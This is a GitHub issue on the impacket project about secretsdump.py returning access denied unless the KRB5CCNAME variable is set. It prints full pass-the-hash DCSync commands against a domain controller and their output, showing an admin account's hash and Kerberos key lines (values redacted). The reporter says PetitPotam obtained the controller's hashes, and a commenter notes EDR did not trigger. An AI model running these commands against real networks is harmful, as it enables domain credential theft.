search

fortra / impacket

Impacket is a collection of Python classes for working with network protocols.
https://www.coresecurity.com
Other
12.99k stars 3.5k forks source link

RPC Access Denied - Except when KRB5CCNAME is set with anything #1674

Open raithedavion opened 6 months ago

raithedavion commented 6 months ago

Configuration

impacket version: v0.11.0 Python version: 3.11.4 Target OS: Kali

This does not work...

secretsdump.py -debug -ntds NTDS 'example.com/dc02$'@dc01.example.com -dc-ip 10.0.0.100 -hashes :<redacted> -outputfile ntdsdump -just-dc-user adminuser1
Impacket v0.11.0 - Copyright 2023 Fortra

[+] Impacket Library Installation Path: /home/raithedavion/.local/pipx/venvs/impacket/lib/python3.11/site-packages/impacket
[+] Exiting NTDSHashes.dump() because rpc_s_access_denied
[*] Cleaning up...

This does?

$ KRB5CCNAME=wtf.txt secretsdump.py -debug -ntds NTDS 'example.com/dc02$'@dc01.example.com -dc-ip 10.0.0.100 -hashes :<redacted> -outputfile ntdsdump -just-dc-user adminuser1
Impacket v0.11.0 - Copyright 2023 Fortra

[+] Impacket Library Installation Path: /home/raithedavion/.local/pipx/venvs/impacket/lib/python3.11/site-packages/impacket
[+] Saving output to ntdsdump
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[+] Calling DRSCrackNames for adminuser1 
[+] Calling DRSGetNCChanges for {50a0e1bd-9021-436c-accb-ffeaa0276702} 
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=adminuser1,OU=Admin Users,DC=example,DC=com
example.com\adminuser1:22773:aad3b435b51404eeaad3b435b51404ee:<redacted>:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Finished processing and printing user's hashes, now printing supplemental information
[*] Kerberos keys grabbed
example.com\adminuser1:aes256-cts-hmac-sha1-96:<redacted>
example.com\adminuser1:aes128-cts-hmac-sha1-96:<redacted>
example.com\adminuser1:des-cbc-md5:<redacted>
[*] Cleaning up...

Additional context

Used petitpotam to get DC's NTLM hashes when went an tried to dump the domain. Trying to dump domain on this client failed, so tried -just-dc-user (rpc_access_denied). Tried just about everything including ticketer, and finally set the KRB5CCNAME and all of a sudden it just works using -just-dc-user.

Repeated the steps, I've set KRB5CCName to blank (export KRB5CCNAMe=) and set it to non-existent files, and blank files (wtf.txt above). For some reason, only with KRB5CCName is set will it dump this domain. I don't know the domain's exact setup so that could have something to do with it, but find it odd that KRB5CCName being set is the fix when using the NTLM hash.

Zamanry commented 2 months ago

I've encountered this issue. EDR on the DC is not triggering nor is any other prevention. No crazy RPC hardening has occurred either. I was unable to even get the -just-dc-user flag to work with a specific user.